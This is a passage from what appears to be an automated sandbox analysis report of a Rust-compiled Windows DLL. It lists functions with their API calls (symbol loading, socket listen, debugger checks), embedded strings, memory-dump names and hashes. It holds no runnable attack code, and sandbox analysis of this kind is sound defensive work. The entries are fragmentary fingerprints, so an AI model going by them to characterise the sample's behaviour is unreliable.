                                                                                                                                                                • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 6C8DB894
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6C8DB8C7
                                                                                                                                                                • GetProcAddress.KERNEL32(SymSetOptions), ref: 6C8DB8F6
                                                                                                                                                                • GetProcAddress.KERNEL32(SymInitializeW), ref: 6C8DB926
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6C8DB942
                                                                                                                                                                • GetProcAddress.KERNEL32(SymGetSearchPathW), ref: 6C8DB9C2
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6C8DB9D7
                                                                                                                                                                • lstrlenW.KERNEL32(00000002), ref: 6C8DB9EC
                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 6C8DBA1D
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 6C8DBA9C
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6C8DBABF
                                                                                                                                                                • GetProcAddress.KERNEL32(EnumerateLoadedModulesW64), ref: 6C8DBB43
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6C8DBB58
                                                                                                                                                                • GetProcAddress.KERNEL32(SymSetSearchPathW), ref: 6C8DBBBD
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 6C8DBBD5
                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 6C8DBC19
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$CurrentProcess$Mutex$CloseCreateHandleLibraryLoadObjectReleaseSingleWaitlstrlen
                                                                                                                                                                • String ID: EnumerateLoadedModulesW64$Local\RustBacktraceMutex00000000$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll
                                                                                                                                                                • API String ID: 422451348-356128008
                                                                                                                                                                • Opcode ID: a3b11f2f079f02439e9f9753ff7816208c6cabba731e4d9f06877534714f6b45
                                                                                                                                                                • Instruction ID: 6e24b8e56c2c9d98a480e645efdd49c5c9da6234cba4ec149c222dee84a6f719
                                                                                                                                                                • Opcode Fuzzy Hash: a3b11f2f079f02439e9f9753ff7816208c6cabba731e4d9f06877534714f6b45
                                                                                                                                                                • Instruction Fuzzy Hash: 74D1E3B1F442589BDB20CFB5C944BAE7BB0BB4A714F21492CE805A7780EB75E845CB90
                                                                                                                                                                Function 6C8DFB30 Relevance: 17.9, APIs: 5, Strings: 5, Instructions: 386libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32(6C906AC4,?,?,?,?,6C906AC4,6C90DDE0), ref: 6C8DFB47
                                                                                                                                                                • GetProcAddress.KERNEL32(SymAddrIncludeInlineTrace), ref: 6C8DFB83
                                                                                                                                                                • GetProcAddress.KERNEL32(SymQueryInlineTrace), ref: 6C8DFBCB
                                                                                                                                                                • GetProcAddress.KERNEL32(SymFromInlineContextW), ref: 6C8DFCC2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$CurrentProcess
                                                                                                                                                                • String ID: SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymQueryInlineTrace$X
                                                                                                                                                                • API String ID: 2190909847-1953985048
                                                                                                                                                                • Opcode ID: 18762eb75c30a756e5b0847702ff5010affcd6918843845585c1fdc60b145117
                                                                                                                                                                • Instruction ID: 72e52033519f30c31201e046862f81c4eed9972af3361fc0683e378dedb86f23
                                                                                                                                                                • Opcode Fuzzy Hash: 18762eb75c30a756e5b0847702ff5010affcd6918843845585c1fdc60b145117
                                                                                                                                                                • Instruction Fuzzy Hash: 32F1DB3164C3809BD7218F28C88179ABBF4FF99314F148E2EF99497290DB75E945DB82
                                                                                                                                                                Function 6C8DE970 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 475COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6C8DEADF
                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00000200,CAFFFB54,00000000), ref: 6C8DEAEC
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DEAFD
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DEB16
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$FullNamePath
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$\Program Files$\\?\\\?\UNC\
                                                                                                                                                                • API String ID: 2482867836-4074784851
                                                                                                                                                                • Opcode ID: 0af6b89730aba5b7cfb2bd140f527269fa563d07a5fe5e3e768749f5b23523c5
                                                                                                                                                                • Instruction ID: 64c2e36f75f0e19995dca2734ffa8d72d1070f2f0fc983df99bb5016a62bfc6b
                                                                                                                                                                • Opcode Fuzzy Hash: 0af6b89730aba5b7cfb2bd140f527269fa563d07a5fe5e3e768749f5b23523c5
                                                                                                                                                                • Instruction Fuzzy Hash: 80028F71E00219CBDB20CF98DA847ADF7B1BB59318F5A8969E815EBB40D730AC45CBD1
                                                                                                                                                                Function 6C8DD170 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 245COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00001000,?,00001000), ref: 6C8DD1EC
                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,00000000), ref: 6C8DD21C
                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,00000001,6C8DCFF7,00000000), ref: 6C8DD26D
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DD483
                                                                                                                                                                Strings
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6C8DD4E9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ConsoleWrite$ByteCharErrorLastMultiWide
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs
                                                                                                                                                                • API String ID: 3036337926-1397593039
                                                                                                                                                                • Opcode ID: 1a03a9db046164d29721878e39c3ac2917236458315f29d7b36ff763cd585adc
                                                                                                                                                                • Instruction ID: 2ff9959b99437ea9819464f926fc7630ab5dad33ff1cb1ca58445fb3333b62f3
                                                                                                                                                                • Opcode Fuzzy Hash: 1a03a9db046164d29721878e39c3ac2917236458315f29d7b36ff763cd585adc
                                                                                                                                                                • Instruction Fuzzy Hash: 56918931A297815AE7129B39C842766F7A4AFD3394F25CB2FF89072891FB30E1808755
                                                                                                                                                                Function 6C8FED3B Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __floor_pentium4
                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                • API String ID: 4168288129-2761157908
                                                                                                                                                                • Opcode ID: b868517ce8cd2cf376b13dadc1fa9415b0adbf9435fc0650d85ee791b28d322f
                                                                                                                                                                • Instruction ID: 3686d460861b5ddc9fc2680e0c5a263895fcaea0b7c7d2c01777fe88ac200160
                                                                                                                                                                • Opcode Fuzzy Hash: b868517ce8cd2cf376b13dadc1fa9415b0adbf9435fc0650d85ee791b28d322f
                                                                                                                                                                • Instruction Fuzzy Hash: A6D25771E082288FDB65CE28CD807DAB7F5EB55348F1445EAD41DE7640EB78AA86CF40
                                                                                                                                                                Function 6C8DCAF0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 239windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(NTDLL.DLL), ref: 6C8DCB56
                                                                                                                                                                • FormatMessageW.KERNEL32(00001200,00000000,?,00000000,?,00000800,00000000), ref: 6C8DCB83
                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,00000800,00000000), ref: 6C8DCC07
                                                                                                                                                                Strings
                                                                                                                                                                • NTDLL.DLL, xrefs: 6C8DCB51
                                                                                                                                                                • assertion failed: self.is_char_boundary(new_len)/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\alloc\src\string.rs, xrefs: 6C8DCDD6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFormatHandleLastMessageModule
                                                                                                                                                                • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\alloc\src\string.rs
                                                                                                                                                                • API String ID: 1273946083-2048172064
                                                                                                                                                                • Opcode ID: bd314e943cb1dc78014351f56136f7c7a388c42d6e6fe24fd9d25725cbc77aef
                                                                                                                                                                • Instruction ID: 9d70367d6b4be583f2eebf4d93e5ddbb286f2bf9528d7c46799f8888de7dc5f5
                                                                                                                                                                • Opcode Fuzzy Hash: bd314e943cb1dc78014351f56136f7c7a388c42d6e6fe24fd9d25725cbc77aef
                                                                                                                                                                • Instruction Fuzzy Hash: 5F910572E013188BDB24DFA8CE907EDBBF5BF06315F21462AE815AB681D3346945CB90
                                                                                                                                                                Function 6C8FE890 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8d81f1fe60c73427d847faae55ee68d9ab69495bc3c3f769d884acf350b1a978
                                                                                                                                                                • Instruction ID: 98c68c24b40c5942fd0f42859776ccff529f325cfdce0ec46c25aa7fa247cf43
                                                                                                                                                                • Opcode Fuzzy Hash: 8d81f1fe60c73427d847faae55ee68d9ab69495bc3c3f769d884acf350b1a978
                                                                                                                                                                • Instruction Fuzzy Hash: 6402A071E012199FDB24CFA9C99069EFBF1FF48354F258669D529E7780D730AA02CB90
                                                                                                                                                                Function 6C8DF8E0 Relevance: 6.1, APIs: 4, Instructions: 105networkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6C8DCA20: WSASocketW.WS2_32(00000017,00000000,00000000,00000000,00000000,00000081), ref: 6C8DCA4D
                                                                                                                                                                • bind.WS2_32(?,?,00000010), ref: 6C8DF9D4
                                                                                                                                                                • listen.WS2_32(?,00000080), ref: 6C8DF9E5
                                                                                                                                                                • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C8A5B22), ref: 6C8DF9F8
                                                                                                                                                                • closesocket.WS2_32(?), ref: 6C8DFA0F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastSocketbindclosesocketlisten
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1850986032-0
                                                                                                                                                                • Opcode ID: b04d266aceb3767422cb96c8d03ab6bf377c00ff62dd3092117321437d60142a
                                                                                                                                                                • Instruction ID: 7c4be3e8368da8440b0c7825b4231c2850f145f7788d1fea32d28a23fd866ff5
                                                                                                                                                                • Opcode Fuzzy Hash: b04d266aceb3767422cb96c8d03ab6bf377c00ff62dd3092117321437d60142a
                                                                                                                                                                • Instruction Fuzzy Hash: C741D370D08289EFCB10CF68D1806AEBBF1EF66314F15855EF895A7782E334A984D761
                                                                                                                                                                Function 6C8F1134 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6C8F1140
                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6C8F120C
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C8F1225
                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6C8F122F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                • Opcode ID: 40cc1f80c9f4d79fbc0de8da8791656809a12aacf4b6bd093329cab3bbade9b3
                                                                                                                                                                • Instruction ID: 97f8621e15d100d5cc953c4278c61adf7c9f72323fc2fe17e1bb536661951bbf
                                                                                                                                                                • Opcode Fuzzy Hash: 40cc1f80c9f4d79fbc0de8da8791656809a12aacf4b6bd093329cab3bbade9b3
                                                                                                                                                                • Instruction Fuzzy Hash: 443114B5D052189BDF60DFA5C9897CDBBB8AF08344F1045AEE40CAB241EB709B85CF44
                                                                                                                                                                Function 6C8E6700 Relevance: 6.0, Strings: 4, Instructions: 1008COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                • .llvm./rust/deps\rustc-demangle-0.1.23\src\lib.rs, xrefs: 6C8E6715
                                                                                                                                                                • `fmt::Error`s should be impossible without a `fmt::Formatter`, xrefs: 6C8E744C
                                                                                                                                                                • ?, xrefs: 6C8E70B2
                                                                                                                                                                • __ZN, xrefs: 6C8E6BA5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: .llvm./rust/deps\rustc-demangle-0.1.23\src\lib.rs$?$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`
                                                                                                                                                                • API String ID: 0-3761308440
                                                                                                                                                                • Opcode ID: 132a5453a7f58b623b2ee1b388dbb1866cea65b046e31579e8a3e224fc5f5b2a
                                                                                                                                                                • Instruction ID: b64e9e76ea6bf136e05915f2d0d697dd89208d9ebf41ddf603ecb10e1469573b
                                                                                                                                                                • Opcode Fuzzy Hash: 132a5453a7f58b623b2ee1b388dbb1866cea65b046e31579e8a3e224fc5f5b2a
                                                                                                                                                                • Instruction Fuzzy Hash: 12821371A083559FD724CF18C98062ABBE2FFCE314F598E1DF5A59BA91D330D8458B82
                                                                                                                                                                Function 6C8DC910 Relevance: 4.6, APIs: 3, Instructions: 90filenativesynchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • NtWriteFile.NTDLL ref: 6C8DC975
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6C8DC985
                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 6C8DC9A5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFileObjectSingleStatusWaitWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3447438843-0
                                                                                                                                                                • Opcode ID: 8e1e7df14a0cdb36d309c31039edd8e288b724655f8e71c8014beb05933c601e
                                                                                                                                                                • Instruction ID: 483123532a59c89a9fcbc72a4d337c14a259dc13aedb6cebcdfe3ce65ed5f978
                                                                                                                                                                • Opcode Fuzzy Hash: 8e1e7df14a0cdb36d309c31039edd8e288b724655f8e71c8014beb05933c601e
                                                                                                                                                                • Instruction Fuzzy Hash: 10316F71608305AFE710CF15C984B9BBBE4EBC5358F108A2DF89997291D774EA48CB92
                                                                                                                                                                Function 6C8F84FB Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6C8F85F3
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6C8F85FD
                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6C8F860A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                • Opcode ID: 47aa51512ca470f91ff6be46057cd348e4f60de5ccdb258e40e2afd725bb6155
                                                                                                                                                                • Instruction ID: 6df540c6a9896a439c4866c9c591c57c9d27c9643fdb280ab623926f8ca5aac9
                                                                                                                                                                • Opcode Fuzzy Hash: 47aa51512ca470f91ff6be46057cd348e4f60de5ccdb258e40e2afd725bb6155
                                                                                                                                                                • Instruction Fuzzy Hash: 0E310674901218ABCF21DF29D988BCDBBB8BF09354F6045EAE41CA7250E7749F858F54
                                                                                                                                                                Function 6C8E8290 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
